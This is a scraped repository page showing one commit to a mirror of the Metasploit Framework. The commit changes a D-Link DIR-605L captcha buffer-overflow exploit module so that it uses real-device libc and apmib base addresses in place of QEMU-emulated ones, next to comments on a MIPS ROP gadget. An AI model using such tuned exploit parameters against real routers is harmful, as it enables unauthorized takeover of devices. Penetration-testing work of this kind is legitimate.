infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add real device libraries base addresses

bug/bundler_fix
jvazquez-r7 2013-10-17 22:34:54 -05:00
parent 3d3a7b3818
commit a00a813649
1 changed files with 4 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb
View File

@ -47,8 +47,10 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'DLink DIR-605L 1.13', [ 'DLink DIR-605L 1.13',
{ {
'Offset' => 94, 'Offset' => 94,
'LibcBase' => 0x4212e000, # QEMU environment 'LibcBase' => 0x2ab86000, # According to Original Exploit by Craig Heffner
'ApmibBase' => 0x42095000, # QEMU environment 'ApmibBase' => 0x2aaef000, # According to Original Exploit by Craig Heffner
#'LibcBase' => 0x4212e000, # QEMU environment
#'ApmibBase' => 0x42095000, # QEMU environment
#LOAD:000248D4 li $a0, 1 ; set $a0 for the sleep() call #LOAD:000248D4 li $a0, 1 ; set $a0 for the sleep() call
#LOAD:000248D8 move $t9, $s1 ; $s1 is controlled after the overflow #LOAD:000248D8 move $t9, $s1 ; $s1 is controlled after the overflow
#LOAD:000248DC jalr $t9 #LOAD:000248DC jalr $t9